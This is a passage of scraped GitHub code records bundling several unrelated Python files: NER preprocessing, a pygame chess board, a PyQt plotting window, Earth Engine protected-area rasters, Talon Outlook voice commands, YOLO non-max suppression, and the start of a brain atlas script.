output\n\ndef prepare_sent(vals, word_to_id, tag_to_id, max_sent_len):\n\twords = [word_to_id[word[0]] for word in vals]\n\ttags = [word[-1] for word in vals]\n\ttags_lst = []\n\n\tfor i in range(len(tags)):\n\n\t\tif tags[i] == \"O\":\n\t\t\ttags_lst.append(0)\n\t\t\tcontinue\n\n\t\ttag = re.sub(r'^B-|^I-', '', tags[i])\n\t\tif i != len(tags) - 1 and tags[i].startswith('B-') and not tags[i + 1].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['U-' + tag])\n\t\telif i != len(tags) - 1 and tags[i].startswith('B-') and tags[i + 1].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['B-' + tag])\n\t\telif i != len(tags) - 1 and tags[i].startswith('I-') and tags[i + 1].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['I-' + tag])\n\t\telif i != len(tags) - 1 and tags[i].startswith('I-') and not tags[i + 1].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['L-' + tag])\n\n\t\t# last index\n\t\telif i == len(tags) - 1 and tags[i].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['L-' + tag])\n\t\telif i == len(tags) - 1 and tags[i].startswith('B-'):\n\t\t\ttags_lst.append(tag_to_id['U-' + tag])\n\n\ttags = tags_lst\n\n\treturn lst_to_array(words, tags, max_sent_len)\n\nif __name__ == \"__main__\":\n\t\n\tMAX_SENT_LEN = 124\n\n\ttrain = read_data(\"data/train.txt\")\n\ttest = read_data(\"data/test.txt\")\n\tvalid = read_data(\"data/valid.txt\")\n\n\tword2idx = {}\n\n\tfor dataset in [train, test, valid]:\n\t\tfor sentence in dataset:\n\t\t\tfor token, label in sentence:\n\t\t\t\tword2idx[token] = len(word2idx)\n\n\tlabel2idx = {'B-LOC': 4, 'B-MISC': 2, 'B-ORG': 3, 'B-PER': 1, 'I-LOC': 8, 'I-MISC': 6, 'I-ORG': 7, 'I-PER': 5,\n\t\t\t\t 'L-LOC': 12, 'L-MISC': 10, 'L-ORG': 11, 'L-PER': 9, 'O': 0, 'U-LOC': 16, 'U-MISC': 14, 'U-ORG': 15, 'U-PER': 13}\n\t\n\t\n\tdef get_char2idx(dataset):\n\t\ttemp = []\n\t\tfor sentence in dataset:\n\t\t\tfor word in 
sentence:\n\t\t\t\ttemp.append(word[0])\n\t\ttemp = set(''.join(temp))\n\t\treturn {k:v for v,k in enumerate(temp)}\n\t\n\tchar2idx = {}\n \n\tfor dataset in [train,test,valid]:\n\t\tchar2idx.update(get_char2idx(train))\n\n\tprint(char2idx,len(char2idx))\n\n\tdef prepare(dataset):\n\t\tfor i,sentence in enumerate(dataset):\n\t\t\tdataset[i] = prepare_sent(sentence, word2idx, label2idx, MAX_SENT_LEN)\n\t\treturn dataset\n\t\n\n\t# np.save(\"processed_data/train\",prepare(train))\n\t# np.save(\"processed_data/test\",prepare(test))\n\t# np.save(\"processed_data/valid\",prepare(valid))\n\t# np.save(\"processed_data/word2idx\",word2idx)\n\t# np.save(\"processed_data/tag2idx\",label2idx)","repo_name":"kamalkraj/Named-Entity-Recognition-with-Bidirectional-LSTM-CNNs-TensorFlow","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69994466641","text":"import pygame\nimport os\n\n# Intialize the pygame\npygame.init()\n\n# create the screen\nscreen = pygame.display.set_mode((1200, 900))\n\n# Background\nbackground = pygame.image.load('tahta.jpg')\n\n# Icon Caption felan\npygame.display.set_caption(\"Chess\")\nicon = pygame.image.load('tahta.jpg')\npygame.display.set_icon(icon)\n\n# Set the size for the image\nDEFAULT_IMAGE_SIZE = (80, 80)\n\n\n# image of pieces\nw_piyonImg = pygame.image.load('./image/white-piyon.png')\nw_kaleImg = pygame.image.load('./image/white-kale.png')\nw_atImg = pygame.image.load('./image/white-at.png')\nw_filImg = pygame.image.load('./image/white-fil.png')\nw_vezirImg = pygame.image.load('./image/white-vezir.png')\nw_sahImg = pygame.image.load('./image/white-şah.png')\n\nb_piyonImg = pygame.image.load('./image/black-piyon.png')\nb_kaleImg = pygame.image.load('./image/black-kale.png')\nb_atImg = pygame.image.load('./image/black-at.png')\nb_filImg = pygame.image.load('./image/black-fil.png')\nb_vezirImg = pygame.image.load('./image/black-vezir.png')\nb_sahImg = pygame.image.load('./image/black-şah.png')\n\n# Scale the image to your needed size\nw_piyonImg = pygame.transform.scale(w_piyonImg, DEFAULT_IMAGE_SIZE)\nw_kaleImg = pygame.transform.scale(w_kaleImg , DEFAULT_IMAGE_SIZE)\nw_atImg = pygame.transform.scale(w_atImg , DEFAULT_IMAGE_SIZE)\nw_filImg = pygame.transform.scale(w_filImg , DEFAULT_IMAGE_SIZE)\nw_vezirImg = pygame.transform.scale(w_vezirImg, DEFAULT_IMAGE_SIZE)\nw_sahImg = pygame.transform.scale(w_sahImg , DEFAULT_IMAGE_SIZE)\n\nb_piyonImg = pygame.transform.scale(b_piyonImg, DEFAULT_IMAGE_SIZE)\nb_kaleImg = pygame.transform.scale(b_kaleImg , DEFAULT_IMAGE_SIZE)\nb_atImg = pygame.transform.scale(b_atImg , DEFAULT_IMAGE_SIZE)\nb_filImg = pygame.transform.scale(b_filImg , DEFAULT_IMAGE_SIZE)\nb_vezirImg = pygame.transform.scale(b_vezirImg, DEFAULT_IMAGE_SIZE)\nb_sahImg = pygame.transform.scale(b_sahImg , DEFAULT_IMAGE_SIZE)\n\n# starting positions(dictionary)\n\n# yerleşim_beyaz = {\"bp1\": [0, 1], \"bp2\": [1, 1], \"bp3\": [2, 1], \"bp4\": [3, 1], \"bp5\": [4, 1], \"bp6\": [5, 1], \"bp7\": [6, 1], \"bp8\": [7, 1], \"bk1\": [0, 0], \"ba1\": [1, 0], \"bf1\": [2, 0], \"bv\": [3, 0], \"bş\": [4, 0], \"bf2\": [5, 0], \"ba2\": [6, 0], \"bk2\": [7, 0],\n# \"wp1\": [0, 6], \"wp2\": [1, 6], \"wp3\": [2, 6], \"wp4\": [3, 6], \"wp5\": [4, 6], \"wp6\": [5, 6], \"wp7\": [6, 6], \"wp8\": [7, 6], \"wk1\": [0, 7], \"wa1\": [1, 7], \"wf1\": [2, 7], \"wv\": [3, 7], \"wş\": [4, 7], \"wf2\": [5, 7], \"wa2\": [6, 7], \"wk2\": [7, 
7]}\n\nyerleşim_siyah = {\"wp1\": [0, 1], \"wp2\": [1, 1], \"wp3\": [2, 1], \"wp4\": [3, 1], \"wp5\": [4, 1], \"wp6\": [5, 1], \"wp7\": [6, 1], \"wp8\": [7, 1], \"wk1\": [0, 0], \"wa1\": [1, 0], \"wf1\": [2, 0], \"wv\": [3, 0], \"wş\": [4, 0], \"wf2\": [5, 0], \"wa2\": [6, 0], \"wk2\": [7, 0],\n \"bp1\": [0, 6], \"bp2\": [1, 6], \"bp3\": [2, 6], \"bp4\": [3, 6], \"bp5\": [4, 6], \"bp6\": [5, 6], \"bp7\": [6, 6], \"bp8\": [7, 6], \"bk1\": [0, 7], \"ba1\": [1, 7], \"bf1\": [2, 7], \"bv\": [3, 7], \"bş\": [4, 7], \"bf2\": [5, 7], \"ba2\": [6, 7], \"bk2\": [7, 7]}\n# mydict = {'george': 16, 'amber': 19}\n# print(list(mydict.keys())[list(mydict.values()).index(16)]) # Prints george\nclass tahta():\n def fill(self, order):\n for piece in list(order.keys()):\n # print(piece)\n if \"b\" in piece:\n if \"p\" in piece:\n screen.blit(b_piyonImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"k\" in piece:\n screen.blit(b_kaleImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"a\" in piece:\n screen.blit(b_atImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"f\" in piece:\n screen.blit(b_filImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"v\" in piece:\n screen.blit(b_vezirImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"ş\" in piece:\n screen.blit(b_sahImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"w\" in piece:\n if \"p\" in piece:\n screen.blit(w_piyonImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"k\" in piece:\n screen.blit(w_kaleImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"a\" in piece:\n screen.blit(w_atImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"f\" in piece:\n screen.blit(w_filImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"v\" in piece:\n screen.blit(w_vezirImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"ş\" in piece:\n screen.blit(w_sahImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n\n def change(self,order, location, destination):\n try:\n a = list(order.keys())[list(order.values()).index(location)]\n print(a)\n order[a] = destination\n print(order)\n return order\n except:\n print(location, destination)\n\n\n# Game Loop\nrunning = True\ntahta = tahta()\ntahta.fill(yerleşim_siyah)\nwhile running:\n\n # RGB = Red, Green, Blue\n screen.fill((0, 0, 0))\n # Background Image\n screen.blit(background, (0, 0))\n tahta.fill(yerleşim_siyah)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # if keystroke is pressed check whether its right or left\n if event.type == pygame.MOUSEBUTTONDOWN and pygame.mouse.get_pressed(num_buttons=3)[0]:\n print(\"down\")\n print(pygame.mouse.get_pos())\n print(int((pygame.mouse.get_pos()[1] - 75) / 93.75))\n print(int((pygame.mouse.get_pos()[0] - 75) / 93.75))\n seçim = [int((pygame.mouse.get_pos()[0] - 75) / 93.75),int((pygame.mouse.get_pos()[1] - 75) / 93.75)]\n print(pygame.mouse.get_pressed(num_buttons=3))\n\n if event.type == pygame.MOUSEBUTTONUP:\n print(\"up\")\n print(seçim , [int((pygame.mouse.get_pos()[1] - 75) / 93.75), int((pygame.mouse.get_pos()[0] - 75) / 93.75)])\n yerleşim_siyah = tahta.change(yerleşim_siyah, seçim , [int((pygame.mouse.get_pos()[0] - 75) / 93.75), int((pygame.mouse.get_pos()[1] - 75) / 93.75)] )\n tahta.fill(yerleşim_siyah)\n # if event.type == pygame.mouse.get_pressed:\n # 
print(\"pressed\")\n\n pygame.display.update()\n","repo_name":"M-Talha-Demir/Chess","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8731729810","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QMainWindow, QTableWidgetItem\nimport data_graph\n\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\n\n\nclass MainWindow(QMainWindow, data_graph.Ui_Form):\n def __init__(self):\n # Это здесь нужно для доступа к переменным, методам\n # и т.д. в файле design.py\n super().__init__()\n self.setupUi(self) # Это нужно для инициализации нашего дизайна\n self.type = \"slave\" # необходимо для проерки на вид вызова окна - главное/дочернее\n self.figure = plt.figure()\n self.canvas = FigureCanvas(self.figure)\n self.toolbar = NavigationToolbar(self.canvas, self)\n # data\n self.data = None\n self.pause = 0\n # set the layout\n layout = QVBoxLayout()\n layout.addWidget(self.toolbar)\n layout.addWidget(self.canvas)\n self.graphicsViews.setLayout(layout)\n #\n # self.restartButton.clicked.connect(self.plot)\n self.pauseButton.toggled.connect(self.pause_set_clr)\n\n def pause_set_clr(self, checked):\n if checked:\n self.pause = 1\n else:\n self.pause = 0\n\n def plot(self, data=None):\n if self.pause == 0:\n\n self.data = data\n name = []\n data_x = []\n data_y = []\n if self.data:\n for graph in self.data:\n name.append(graph[0])\n data_x.append(graph[1])\n data_y.append(graph[2])\n else:\n name = [\"Test\"]\n data_x = [[0, 1, 2, 3]]\n data_y = [[0, 1, 4, 9]]\n time = data_x[0]\n # отрисуем график\n # instead of ax.hold(False)\n self.figure.clear()\n # create an axis\n axes = self.figure.add_subplot(111)\n # plot data\n [axes.plot(data_x[i], data_y[i], line_type_from_index(i), label=name[i]) for i in range(len(name))]\n axes.set_title(\"Данные с АЦП\")\n axes.set_ylabel(\"АЦП, кв\")\n axes.set_xlabel(\"Время, с\")\n axes.grid()\n # refresh canvas\n self.canvas.draw()\n # заполним таблицу\n self.tableWidget.setRowCount(len(self.data) + 1)\n time_name_item = QTableWidgetItem(\"Время\")\n self.tableWidget.setItem(0, 1, time_name_item)\n time_item = QTableWidgetItem(\"NA\") # \"{:.3g}\".format(data_x[0][-1]))\n self.tableWidget.setItem(0, 2, time_item)\n for row in range(len(self.data)):\n for column in range(1, 3):\n if column == 1:\n table_item = QTableWidgetItem(name[row])\n elif column == 2:\n try:\n table_item = QTableWidgetItem(\"{:.3g}\".format(data_y[row][-1]))\n except IndexError:\n table_item = QTableWidgetItem(\"NA\")\n else:\n table_item = QTableWidgetItem(\"NA\")\n self.tableWidget.setItem(row, column, table_item)\n else:\n pass\n\n # Переопределение ме��ода closeEvent, для перехвата события закрытия окна\n def closeEvent(self, event):\n if self.type == \"master\":\n event.ignore()\n else:\n self.hide()\n\n\ndef line_type_from_index(n):\n color_line = [\"b\", \"r\", \"g\", \"c\", \"m\", \"y\", \"k\"]\n style_line = [\"-\", \"--\", \"-.\", \":\"]\n try:\n color = color_line[n % len(color_line)]\n style = style_line[n // len(color_line)]\n # print(n % len(color_line), n // len(color_line))\n return style + color\n except Exception:\n return \"-r\"\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = MainWindow()\n main.type = \"master\"\n 
main.show()\n sys.exit(app.exec_())\n","repo_name":"a-styuf/oai_dd_pk","sub_path":"data_graph_main.py","file_name":"data_graph_main.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38417049957","text":"n=int(input(\"Enter the number of terms to be printed:\")) \na=sum=0\nb=count=1\nprint(\"Fibonacci Series: \",\" \")\nwhile(count <= n):\n print(sum,\" \")\n count += 1\n a = b\n b = sum\n sum = a + b\n","repo_name":"dhanush2006/Python-MyCaptain","sub_path":"looping-task-main/Create fibonacci_series.py","file_name":"Create fibonacci_series.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29717996225","text":"import os\nimport ee\n\nimport modules.image_prep as image_prep\nimport modules.area_stats as area_stats\nimport modules.WDPA_prep as WDPA_prep\n\nfrom datasets.template_images import template_image_1\n\nee.Initialize()\n\ndataset_id = 13\n\nwdpa_pnt = ee.FeatureCollection(\"WCMC/WDPA/current/points\");\n\nwdpa_poly = ee.FeatureCollection(\"WCMC/WDPA/current/polygons\");\n\n#apply filters and merge polygon with buffered points \nwdpa_filt = WDPA_prep.filterWDPA(wdpa_poly) ##.merge(WDPA_prep.filterWDPA(wdpa_pnt).filter(ee.Filter.gt('REP_AREA', 0)).map(WDPA_prep.bufferByArea));\n#turn into image (no crs etc set currently)\nwdpa_overlap = wdpa_filt.reduceToImage(['STATUS_YR'],'min'); #make into raster - remove mask if want 0s\n\n#make binary\nwdpa_binary = wdpa_overlap.lt(2070).unmask()\n\n\n#reproject based on gfc data (approx 30m res which should be easily)\ncrs_template = template_image_1.select(0).projection().crs().getInfo()\n\nwdpa_binary_reproj = wdpa_binary.reproject(\n crs= crs_template,\n scale= area_stats.get_scale_from_image(template_image_1),\n).int8()\n\nprotected_areas_WDPA_area_hectares = area_stats.binary_to_area_hectares(wdpa_binary_reproj)\n\nprotected_areas_WDPA_area_hectares = area_stats.set_scale_property_from_image(protected_areas_WDPA_area_hectares,template_image_1,0,debug=True).set(\"dataset_id\",dataset_id)\n","repo_name":"lecrabe/fdap","sub_path":"datasets/wcmc_wdpa_protection.py","file_name":"wcmc_wdpa_protection.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"9484287062","text":"from talon.voice import Context, Key\nfrom ..misc.switcher import switch_app\n\nctx = Context(\"outlook\", bundle=\"com.microsoft.Outlook\")\n\nctx.keymap(\n {\n \"reply to e-mail\": Key(\"cmd-r\"),\n \"send e-mail\": Key(\"cmd-enter\"),\n \"clear flag\": None,\n \"next pain\": Key(\"shift-ctrl-[\"),\n \"preev pain\": Key(\"shift-ctrl-]\"),\n \"dismiss outlook\": [lambda m: switch_app(name=\"outlook\"), Key(\"cmd-w\")],\n }\n)\n\n\n\"\"\"\npack = Packages.register\n name: \"custom outlook\"\n applications: [\"com.microsoft.Outlook\"]\n description: \"custom commands for outlook\"\n\npack.commands\n \"reply-to-email\":\n spoken: \"reply to e-mail\"\n misspoken: 'reply email'\n description: \"reply to email\"\n enabled: true\n action: (input) ->\n @key 'r', 'command'\n \"send-email\":\n spoken: \"send e-mail\"\n description: \"send email\"\n enabled: true\n action: (input) ->\n @key 'enter', 'command'\n \"clear-flag\":\n spoken: \"clear flag\"\n description: \"clear flag\"\n enabled: true\n action: (input) ->\n @do 'os:openMenuBarPath', ['Message', 'Follow Up', 'Clear 
Flag']\n\npack.implement\n 'object:previous': -> @key '[', 'control'\n 'object:next': -> @key ']', 'control'\n 'object:backward': -> @key '[', 'shift control'\n 'object:forward': -> @key ']', 'shift control'\n\"\"\"\n","repo_name":"dwiel/talon_community","sub_path":"apps/outlook.py","file_name":"outlook.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"3"} +{"seq_id":"28069123150","text":"from __future__ import annotations\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtCore import pyqtSignal\nfrom typing import NamedTuple\n\nfrom services.setting import Setting\nfrom services.colour_setting import ColourSetting\nfrom services.sector_editor import SectorEditor\nfrom APImodels.sector import Sector\nfrom APImodels.problem import Problem\nfrom APImodels.colour import Colour\n\nclass SectorCellData(NamedTuple):\n # cell model containing data for sector cell\n\n col : int\n width : int\n bg_colour : Colour\n text_colour : Colour\n text : str\n problem_count : str\n\n\nclass SectorCellDataBuilder():\n # build sector cell data from either:\n # - sectors\n # - col - in case there isn't one\n\n def __init__(self, sector_editor:SectorEditor):\n self.sector_setting = sector_editor\n self.colour_setting = Setting.get(ColourSetting)\n\n def from_sector(self, sector:Sector):\n\n col = self.sector_setting.get_col(sector.name)\n width = 96 \n text = sector.name.upper()\n count = str(sector.count)\n bg_colour = self._background_colour(sector.setting)\n text_colour = self._text_colour(sector.setting)\n \n return SectorCellData(col, width, bg_colour, text_colour, text, count)\n\n def _background_colour(self, setting:bool):\n colour_str = 'setting' if setting else 'default'\n return self.colour_setting.get_bg_colour(colour_str) \n\n def _text_colour(self, setting:bool):\n colour_str = 'setting' if setting else 'default'\n return self.colour_setting.get_text_colour(colour_str)\n \n def from_col(self, col:int):\n width = 96 \n text = self.sector_setting.get_sector(col).upper()\n bg_colour = self._background_colour(False)\n text_colour = self._text_colour(False)\n\n return SectorCellData(col, width, bg_colour, text_colour, text, '0') \n\n\nclass SectorAreaData(NamedTuple):\n cells : tuple[SectorCellData,...]\n n_col : int\n height : int = 48\n \nclass SectorAreaDataBuilder():\n \n def __init__(self, sector_editor:SectorEditor):\n self._builder = SectorCellDataBuilder(sector_editor)\n self._sector_setting = sector_editor\n\n @property\n def n_col(self) -> int:\n return self._sector_setting.length()\n\n @property\n def sectors(self) -> tuple:\n return self._sector_setting.get_all_sectors()\n\n def default(self):\n cells = [self._builder.from_col(index) for index in range(self.n_col)]\n cells.sort(key= lambda x : x.col)\n return SectorAreaData(tuple(cells), self.n_col)\n\n def from_problems(self, problems:tuple[Problem,...]):\n prob = tuple(problems)\n if len(prob) == 0 :\n return self.default()\n set_date = self._last_setting_date(prob)\n sectors = [Sector.from_problems(s, prob, set_date) for s in self.sectors]\n cells = list([self._builder.from_sector(s) for s in sectors ])\n cells.sort(key= lambda x : x.col)\n return SectorAreaData(tuple(cells), self.n_col)\n\n def _last_setting_date(self, problems:tuple[Problem,...]):\n prob = tuple(problems)\n if len(prob) == 0: \n raise ValueError('_get_last_setting_date() don\\'t accept empty generator')\n return max([p.set_date for p in prob]) \n\n\nclass SectorAreaModel(QObject):\n 
\n cellsChanged = pyqtSignal(bool)\n _changes : SectorAreaData\n\n def __init__(self, sector_editor:SectorEditor):\n super().__init__()\n self._builder = SectorAreaDataBuilder(sector_editor)\n self._data = self._builder.default()\n self.changes = self._builder.default()\n\n @property\n def changes(self):\n return self._changes\n\n @changes.setter\n def changes(self, value: SectorAreaData):\n self._update_data(value)\n self._changes = value\n self.cellsChanged.emit(True)\n\n def _update_data(self, value: SectorAreaData):\n old_data = list(self._data.cells)\n new_data = list(value.cells)\n new_cells = [d.col for d in new_data]\n old_data_to_retain = [ d for d in old_data if not d.col in new_cells]\n new_data += old_data_to_retain\n self._data = SectorAreaData(tuple(new_data), value.n_col)\n\n def problems_changed(self, problems: tuple[Problem,...]) -> None:\n self.changes = self._builder.from_problems(problems)","repo_name":"Supasiti/problem_manager","sub_path":"models/sector_area_model.py","file_name":"sector_area_model.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8143246654","text":"import time\r\nimport numpy as np\r\nimport torch\r\nimport torchvision\r\n\r\n\r\ndef scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):\r\n # Rescale coords (xyxy) from img1_shape to img0_shape\r\n if ratio_pad is None: # calculate from img0_shape\r\n gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new\r\n pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding\r\n else:\r\n gain = ratio_pad[0][0]\r\n pad = ratio_pad[1]\r\n coords[..., [0, 2]] -= pad[0] # x padding\r\n coords[..., [1, 3]] -= pad[1] # y padding\r\n coords[..., :4] /= gain\r\n clip_coords(coords, img0_shape)\r\n return coords\r\n\r\n\r\ndef clip_coords(boxes, img_shape):\r\n # Clip bounding xyxy bounding boxes to image shape (height, width)\r\n boxes[..., 0].clamp_(0, img_shape[1]) # x1\r\n boxes[..., 1].clamp_(0, img_shape[0]) # y1\r\n boxes[..., 2].clamp_(0, img_shape[1]) # x2\r\n boxes[..., 3].clamp_(0, img_shape[0]) # y2\r\n\r\n\r\ndef xyxy2xywh(x):\r\n # Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right\r\n y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.copy(x)\r\n y[..., 0] = (x[..., 0] + x[..., 2]) / 2 # x center\r\n y[..., 1] = (x[..., 1] + x[..., 3]) / 2 # y center\r\n y[..., 2] = x[..., 2] - x[..., 0] # width\r\n y[..., 3] = x[..., 3] - x[..., 1] # height\r\n return y\r\n\r\n\r\ndef xywh2xyxy(x):\r\n # Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right\r\n y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.copy(x)\r\n w_half = x[..., 2] / 2\r\n h_half = x[..., 3] / 2\r\n y[..., 0] = x[..., 0] - w_half # top left x\r\n y[..., 1] = x[..., 1] - h_half # top left y\r\n y[..., 2] = x[..., 0] + w_half # bottom right x\r\n y[..., 3] = x[..., 1] + h_half # bottom right y\r\n return y\r\n\r\n\r\ndef non_max_suppression(prediction,\r\n conf_thres=0.1, iou_thres=0.5,\r\n *, max_det=20, agnostic=False, return_per_image=True):\r\n \"\"\"Performs Non-Maximum Suppression (NMS) on inference results\r\n\r\n Params:\r\n prediction: (batch_size, locations, 4 + 1 + num_classes)\r\n\r\n Returns:\r\n detections with shape: nx6 (x1, y1, x2, y2, conf, cls)\r\n \"\"\"\r\n batch_size = prediction.shape[0]\r\n num_classes = 
prediction.shape[-1] - 5 # number of classes\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Settings\r\n min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height\r\n multi_label = (num_classes > 1) # multiple labels per box (adds 0.5ms/img)\r\n\r\n prediction = prediction.float() # crucial detail!\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Filter by object-ness\r\n object_candidate = (prediction[..., 4] > conf_thres).nonzero(as_tuple=False).T # candidates (2, nonzero_targets)\r\n # object_candidate[0]: batch_idx, object_candidate[1]: location_idx\r\n prediction = prediction[object_candidate[0], object_candidate[1], :].contiguous()\r\n # prediction: (num_targets, 4 + 1 + num_classes)\r\n if not prediction.shape[0]: # no targets\r\n return [torch.zeros(0, 6, dtype=prediction.dtype, device=prediction.device)] * batch_size\r\n\r\n # prediction = torch.cat((prediction, object_candidate[0][:, None]), dim=1)\r\n # prediction: (num_targets, 4 + 1 + num_classes + 1)\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Prepare NMS\r\n prediction[:, 5:] *= prediction[:, 4:5] # conf = obj_conf * cls_conf\r\n box = xywh2xyxy(prediction[..., :4]) # (center_x, center_y, width, height) -> (x1, y1, x2, y2)\r\n\r\n if multi_label:\r\n conf_candidate = (prediction[:, 5:] > conf_thres).nonzero(as_tuple=False).T # candidates (2, num_targets)\r\n # conf_candidate[0]: location_idx, conf_candidate[1]: class_idx - 5\r\n boxes = box[conf_candidate[0]] # (num_targets, 4)\r\n scores = prediction[conf_candidate[0], conf_candidate[1] + 5] # (num_targets,)\r\n classes = conf_candidate[1].float() # (num_targets,)\r\n indices = object_candidate[0][conf_candidate[0]] # (num_targets,)\r\n else: # always class 0\r\n conf_candidate = (prediction[:, 5] > conf_thres).nonzero(as_tuple=False).T # candidates (1, num_targets,)\r\n # conf_candidate[0]: location_idx\r\n boxes = box[conf_candidate[0]] # (num_targets, 4)\r\n scores = prediction[conf_candidate[0], 5] # (num_targets,)\r\n classes = torch.zeros(boxes.shape[0], dtype=boxes.dtype, device=boxes.device) # (num_targets,)\r\n indices = object_candidate[0][conf_candidate[0]] # (num_targets,)\r\n\r\n if not boxes.shape[0]: # no targets\r\n return [torch.zeros(0, 6, dtype=prediction.dtype, device=prediction.device)] * batch_size\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Run batched NMS\r\n offset = classes * (0 if agnostic else max_wh)\r\n boxes_with_offset = boxes + offset[:, None] # boxes (offset by class)\r\n\r\n nms_indices = torchvision.ops.boxes.batched_nms(boxes_with_offset, scores, indices, iou_threshold=iou_thres)\r\n nms_result_indices = indices[nms_indices] # (num_boxes,)\r\n\r\n nms_result = torch.cat([boxes[nms_indices, :],\r\n scores[nms_indices, None],\r\n classes[nms_indices, None]], dim=1) # (num_boxes, 6)\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Split to per-batch (most slowest part)\r\n\r\n if return_per_image:\r\n output = []\r\n for image_idx in range(batch_size):\r\n image_result = nms_result[nms_result_indices == image_idx].clone()\r\n if image_result.shape[0] > max_det:\r\n image_result = image_result[:max_det]\r\n output.append(image_result)\r\n else:\r\n output = (nms_result, nms_result_indices)\r\n\r\n return 
output\r\n","repo_name":"aiha-lab/Optimization-method-for-human-detection-on-street-view-CCTV-images","sub_path":"kh_utils/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"25156237737","text":"import sys\nsys.path.append('/scratch/programming/pipeline/pipeline')\nfrom pipeline.Controllers.SqlController import SqlController\nfrom atlas.Assembler import get_assembled_atlas_v7\nimport plotly.graph_objects as go\nimport numpy as np\nfrom Plotter.Plotter import Plotter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom atlas.atlas_manager import Atlas\nfrom pipeline.Controllers.SqlController import SqlController\nfrom atlas.NgSegmentMaker import NgConverter\nfrom atlas.Assembler import Assembler,get_v7_volume_and_origin,get_assembled_atlas_v7\nfrom pipeline.Controllers.SqlController import SqlController\nimport pickle\nfrom Plotter.Plotter import Plotter\nimport numpy as np\n\nanimal = 'DK41'\ncontroller = SqlController(animal)\n# cell_controller = MarkedCellController()\nresolution = controller.get_resolution(animal)\n# cells = cell_controller.get_marked_cells(search_dictionary = dict(id = 3586))\n# # cells = cells*resolution\n# bin_voxel = [500,500,500]\n# bins = []\n# for i,stepi in enumerate(bin_voxel):\n# axis_max = cells.max(axis=0)[i]\n# axis_bins = list(range(0,int(axis_max)+1,stepi))\n# bins.append(axis_bins)\n# count,bins =np.histogramdd(cells,bins = bins)\n\nassenbler = get_assembled_atlas_v7()\n\ndef hist3d(data):\n origin = np.min(data,axis = 1).astype(int)\n end = np.max(data,axis = 1).astype(int)+1\n data = data - np.min(data,axis = 1).reshape(-1,1)\n shape = np.max(data,axis = 1).astype(int)\n density = np.zeros(shape)\n npoints = data.shape[1]\n for i in range(npoints):\n point = data[:,i].astype(int)-1\n density[point[0],point[1],point[2]] += 1\n return density,origin,end \n\ncontroller = SqlController('DK39')\natlas = Atlas(atlas = 'atlasV7')\natlas.get_com_array()\nassembler = Assembler(check=False,side = '_R')\nassembler.volumes,assembler.origins = get_v7_volume_and_origin()\nassembler.sqlController = atlas.sqlController\nassembler.structures = list(assembler.volumes.keys())\nsegment_to_id = controller.get_segment_to_id_where_segment_are_brain_regions()\nfor i in segment_to_id:\n 